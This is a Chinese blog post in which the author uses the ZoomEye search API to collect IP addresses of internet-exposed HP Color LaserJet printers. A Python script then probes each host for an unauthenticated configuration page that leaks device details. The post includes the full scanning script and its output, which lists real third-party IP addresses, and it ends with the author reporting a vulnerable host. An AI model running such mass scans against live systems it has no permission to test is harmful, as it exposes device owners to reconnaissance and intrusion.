标签:
ZoomEye想必大家都很熟悉,不熟悉的话。撒旦总是熟悉的。还不熟悉的话,google你总是熟悉的。否则你实在不应该看这篇文章了。233333,开个玩笑。不过话说回来了,我这么一说,你大概是知道ZoomEye是怎么回事的。不知道的话,请百度一下。我等你回来~
说了这么多的废话,今天到底要干啥?下面开始表演。
一次十分机密的任务,然后写了一个ZoomEye api的sdk。恰好又在Seebug写了一个插件。是检测一个IOT设备漏洞的。然后找插件检测站点时候犯难了。死活找不到。
话说你不是说ZoomEye多么的厉害吗?
没错!!!
就是这个。我用自己写的SDK配合开放的api。接着:
#!/usr/bin/env python # -*-coding:utf-8 -*- import sys import requests import zoomeye.zoomeye as zoomeye test = zoomeye.zoomeye() username = ‘your main@qq.com‘ password = ‘your zoomeye account password‘ token = test.logIn(username, password)
就这样我已经登录了ZoomEye。什么?你说你不信?
#!/usr/bin/env python # -*-coding:utf-8 -*- import sys import requests import zoomeye.zoomeye as zoomeye test = zoomeye.zoomeye() username = ‘your main@qq.com‘ password = ‘your ZoomEye account password‘ token = test.logIn(username, password) result = test.search(‘web‘,query=‘HP Color LaserJet‘,page=1,facets=‘app,os‘) print result
告诉我你看到了什么?
是不是瞬间感觉自己萌萌哒~
接着我这样写了一个脚本。
#!/usr/bin/env python
# -*-coding:utf-8 -*-
import sys
import requests
import zoomeye.zoomeye as zoomeye
test = zoomeye.zoomeye()
username = ‘your main@qq.com‘
password = ‘your ZoomEye account password‘
token = test.logIn(username, password)
result = test.search(‘web‘,query=‘HP Color LaserJet‘,page=1,facets=‘app,os‘)
target = []
for i in result:
for x in i[‘matches‘]:
print x[‘ip‘]
target.append(x[‘ip‘][0])
for ip in target:
try:
payload = ‘/hp/device/InternalPages/Index?id=ConfigurationPage‘
url = ‘http://‘ + ip + payload
res_exp = requests.get(url)
print ‘[-]checking url %s‘ % url
if res_exp.status_code == 200 and ‘HomeDeviceName‘ in res_exp.content and ‘HomeDeviceIp‘ in res_exp.content:
print ‘[+]%s is vul‘ % url
elif res_exp.status_code != 200:
print ‘[+]%s is static‘ % url
else:
pass
except Exception, e:
pass
然后结果是这样的:
[-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage [-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static [-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage [+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static
没卵用啊~_~
换一页继续:修改page参数。
因为账户等级的问题。这里是有限制策略的。 当修改为2的时候,结果
{u‘url‘: u‘https://www.zoomeye.org/api/doc#limitations‘, u‘message‘: u‘account was suspend, excceeding the 30% of total (7.5)‘, u‘error‘: u‘suspended‘}
然后试了试网页版。经过不懈努力。
最终
https://xxxxx/hp/device/InternalPages/Index?id=ConfigurationPage is vul
插件提交在了Seebug。
标签:
原文地址:http://www.cnblogs.com/magic-zero/p/5448725.html
